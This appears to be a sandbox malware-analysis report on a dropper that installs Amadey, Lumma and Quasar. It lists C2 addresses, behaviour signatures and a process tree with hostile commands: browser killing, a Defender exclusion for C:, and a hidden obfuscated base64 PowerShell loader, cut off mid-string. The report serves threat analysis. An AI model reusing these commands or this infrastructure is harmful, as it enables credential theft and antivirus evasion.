Overview

overview

10

Static

static

3

random.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250313-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/04/2025, 08:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    random.exe

  • Size

    2.3MB

  • MD5

    d5d4908264b3421c868ff4a8d51c17c8

  • SHA1

    5433dd2e7637f6421ca5a84e9474e8ec8322427e

  • SHA256

    cfbd11e2aa54eab712df4dcdd84f9252d3bef3910933b0479a24057265c66c9c

  • SHA512

    3ec0ff63c0bd63ff4a0321bb31c71d78f94572efbbf8f1ea5abf88bf2a41548d7a79d65fec2e1b204bb61b1aa5203dc5182a8aa140ba24c116fd1b04d92c2496

  • SSDEEP

    49152:pN+PuGnGFC6vjVuxuEZWRPtO9pZFK+9tiN5Sz8UvBTmpDK6G:pNe/nYCj44WRev9tiPSxvBTGDv

Score
10/10
amadeygcleanerhealerlummaquasar092155office04bootkitcredential_accessdefense_evasiondiscoverydropperevasionexecutionloaderpersistencespywarestealertrojan

Malware Config

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://orodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://6targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://hcosmosyf.top/GOsznj

https://hywnnavstarx.shop/FoaJSi

https://targett.top/dsANGt

https://rodformi.run/aUosoz

https://1ironloxp.live/aksdd

https://vspacedbv.world/EKdlsk

https://hadvennture.top/GKsiio

https://wstarcloc.bet/GOksAo

https://atargett.top/dsANGt

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

C2

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes
  • encryption_key

    BF72099FDBC6B48816529089CF1CF2CF86357D14

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Modded Client Startup

  • subdirectory

    SubDir

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

    loadergcleaner
  • Gcleaner family
    gcleaner
  • Healer

    Healer an antivirus disabler dropper.

    dropperhealer
  • Healer family
    healer
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • Lumma family
    lumma
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    defense_evasiontrojan
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
    defense_evasiontrojan
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
    defense_evasion
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file 21 IoCs
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • Checks BIOS information in registry 2 TTPs 28 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

    credential_accessstealer
  • Deletes itself 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 31 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Reads ssh keys stored on the system 2 TTPs

    Tries to access SSH used by SSH programs.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Windows security modification 2 TTPs 2 IoCs
    defense_evasiontrojan
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 6 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 19 IoCs
    discovery
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Windows directory 14 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

    defense_evasion
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 47 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 28 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 44 IoCs
    defense_evasion
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 2 IoCs
  • NTFS ADS 1 IoCs
  • Runs net.exe
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 27 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2440
      • C:\Windows\SysWOW64\svchost.exe
        "C:\Windows\System32\svchost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2604
    • C:\Users\Admin\AppData\Local\Temp\random.exe
      "C:\Users\Admin\AppData\Local\Temp\random.exe"
      1⤵
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3300
      • C:\Users\Admin\AppData\Local\cwUJ9HbGFCi8.exe
        "C:\Users\Admin\AppData\Local\cwUJ9HbGFCi8.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:5824
        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:876
          • C:\Users\Admin\AppData\Local\Temp\10416720101\759b64dc28.exe
            "C:\Users\Admin\AppData\Local\Temp\10416720101\759b64dc28.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2408
            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
              "C:\Users\Admin\AppData\Local\Temp\10416720101\759b64dc28.exe"
              5⤵
              • Downloads MZ/PE file
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:624
          • C:\Users\Admin\AppData\Local\Temp\10416730101\e9747f2ad1.exe
            "C:\Users\Admin\AppData\Local\Temp\10416730101\e9747f2ad1.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4208
            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
              "C:\Users\Admin\AppData\Local\Temp\10416730101\e9747f2ad1.exe"
              5⤵
              • Downloads MZ/PE file
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:5644
          • C:\Users\Admin\AppData\Local\Temp\10416740101\5cb3956c34.exe
            "C:\Users\Admin\AppData\Local\Temp\10416740101\5cb3956c34.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:4064
          • C:\Users\Admin\AppData\Local\Temp\10416750101\344c55ffeb.exe
            "C:\Users\Admin\AppData\Local\Temp\10416750101\344c55ffeb.exe"
            4⤵
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:1448
          • C:\Users\Admin\AppData\Local\Temp\10416760101\89e5e39ec1.exe
            "C:\Users\Admin\AppData\Local\Temp\10416760101\89e5e39ec1.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:2948
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM firefox.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:5588
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM chrome.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:5816
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM msedge.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:5476
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM opera.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4040
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /F /IM brave.exe /T
              5⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4060
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:5432
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                6⤵
                • Checks processor information in registry
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                • Suspicious use of SetWindowsHookEx
                PID:5540
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1996 -prefsLen 27099 -prefMapHandle 2000 -prefMapSize 270279 -ipcHandle 2076 -initialChannelId {578eed96-4918-4b06-84dd-457be1d494f2} -parentPid 5540 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5540" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                  7⤵
                    PID:4840
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2480 -prefsLen 27135 -prefMapHandle 2484 -prefMapSize 270279 -ipcHandle 2492 -initialChannelId {d93ca47c-a0f2-4a24-9b11-e74cb66c400a} -parentPid 5540 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5540" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                    7⤵
                    • Checks processor information in registry
                    PID:4896
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3840 -prefsLen 25213 -prefMapHandle 3844 -prefMapSize 270279 -jsInitHandle 3848 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3856 -initialChannelId {48a35c31-7a87-4d06-8f42-1f04941de1c7} -parentPid 5540 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5540" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                    7⤵
                    • Checks processor information in registry
                    PID:1136
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4008 -prefsLen 27325 -prefMapHandle 4012 -prefMapSize 270279 -ipcHandle 3848 -initialChannelId {7422a028-2939-4d03-90f3-5fef9b21f6d8} -parentPid 5540 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5540" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                    7⤵
                      PID:4308
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4452 -prefsLen 34824 -prefMapHandle 4456 -prefMapSize 270279 -jsInitHandle 4460 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4468 -initialChannelId {bc8e5a0a-06e6-4990-9bc5-30415f18a5ea} -parentPid 5540 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5540" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                      7⤵
                      • Checks processor information in registry
                      PID:5672
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5016 -prefsLen 35012 -prefMapHandle 5020 -prefMapSize 270279 -ipcHandle 5028 -initialChannelId {73200a29-726f-4aca-bf68-f169c169002c} -parentPid 5540 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5540" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                      7⤵
                      • Checks processor information in registry
                      PID:5820
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5264 -prefsLen 32952 -prefMapHandle 5268 -prefMapSize 270279 -jsInitHandle 5272 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5276 -initialChannelId {de997610-78e3-4f1c-8143-9fd2ea435682} -parentPid 5540 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5540" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                      7⤵
                      • Checks processor information in registry
                      PID:3948
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5512 -prefsLen 32952 -prefMapHandle 5516 -prefMapSize 270279 -jsInitHandle 5520 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5324 -initialChannelId {33592d21-4a2a-4d73-883b-7dde3b56056c} -parentPid 5540 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5540" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                      7⤵
                      • Checks processor information in registry
                      PID:5404
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5700 -prefsLen 32952 -prefMapHandle 5704 -prefMapSize 270279 -jsInitHandle 5708 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5716 -initialChannelId {29e3ba17-710b-42ed-afea-7896b809b39c} -parentPid 5540 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5540" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                      7⤵
                      • Checks processor information in registry
                      PID:2404
              • C:\Users\Admin\AppData\Local\Temp\10416770101\2fb053b2f2.exe
                "C:\Users\Admin\AppData\Local\Temp\10416770101\2fb053b2f2.exe"
                4⤵
                • Modifies Windows Defender DisableAntiSpyware settings
                • Modifies Windows Defender Real-time Protection settings
                • Modifies Windows Defender TamperProtection settings
                • Modifies Windows Defender notification settings
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Windows security modification
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4700
              • C:\Users\Admin\AppData\Local\Temp\10416780101\d152a839e2.exe
                "C:\Users\Admin\AppData\Local\Temp\10416780101\d152a839e2.exe"
                4⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:1980
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  5⤵
                    PID:2164
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2208
                • C:\Users\Admin\AppData\Local\Temp\10416790101\99e4525b10.exe
                  "C:\Users\Admin\AppData\Local\Temp\10416790101\99e4525b10.exe"
                  4⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4660
                • C:\Users\Admin\AppData\Local\Temp\10416800101\YGYZCmt.exe
                  "C:\Users\Admin\AppData\Local\Temp\10416800101\YGYZCmt.exe"
                  4⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:4668
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4272
                • C:\Users\Admin\AppData\Local\Temp\10416810101\Rm3cVPI.exe
                  "C:\Users\Admin\AppData\Local\Temp\10416810101\Rm3cVPI.exe"
                  4⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3216
                • C:\Users\Admin\AppData\Local\Temp\10416820101\p3hx1_003.exe
                  "C:\Users\Admin\AppData\Local\Temp\10416820101\p3hx1_003.exe"
                  4⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: MapViewOfSection
                  PID:5780
                  • C:\Windows\SYSTEM32\cmd.exe
                    cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                    5⤵
                      PID:5072
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell.exe Add-MpPreference -ExclusionPath 'C:'
                        6⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3448
                    • C:\Windows\system32\svchost.exe
                      "C:\Windows\system32\svchost.exe"
                      5⤵
                      • Downloads MZ/PE file
                      • Adds Run key to start application
                      PID:4088
                      • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                        6⤵
                        • Executes dropped EXE
                        PID:3008
                      • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                        6⤵
                        • Deletes itself
                        • Executes dropped EXE
                        PID:2176
                        • C:\Users\Admin\AppData\Local\Temp\{ffd6be92-44d5-438d-bf86-801e971ede95}\1d013016.exe
                          "C:\Users\Admin\AppData\Local\Temp\{ffd6be92-44d5-438d-bf86-801e971ede95}\1d013016.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
                          7⤵
                          • Executes dropped EXE
                          PID:7296
                  • C:\Users\Admin\AppData\Local\Temp\10416830101\qWR3lUj.exe
                    "C:\Users\Admin\AppData\Local\Temp\10416830101\qWR3lUj.exe"
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:1248
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      5⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1420
                  • C:\Users\Admin\AppData\Local\Temp\10416850101\TbV75ZR.exe
                    "C:\Users\Admin\AppData\Local\Temp\10416850101\TbV75ZR.exe"
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:5780
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      5⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:5592
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 5592 -s 512
                        6⤵
                        • Program crash
                        PID:6208
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10416861121\5ym0ZYg.cmd"
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:6272
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10416861121\5ym0ZYg.cmd"
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:6324
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwa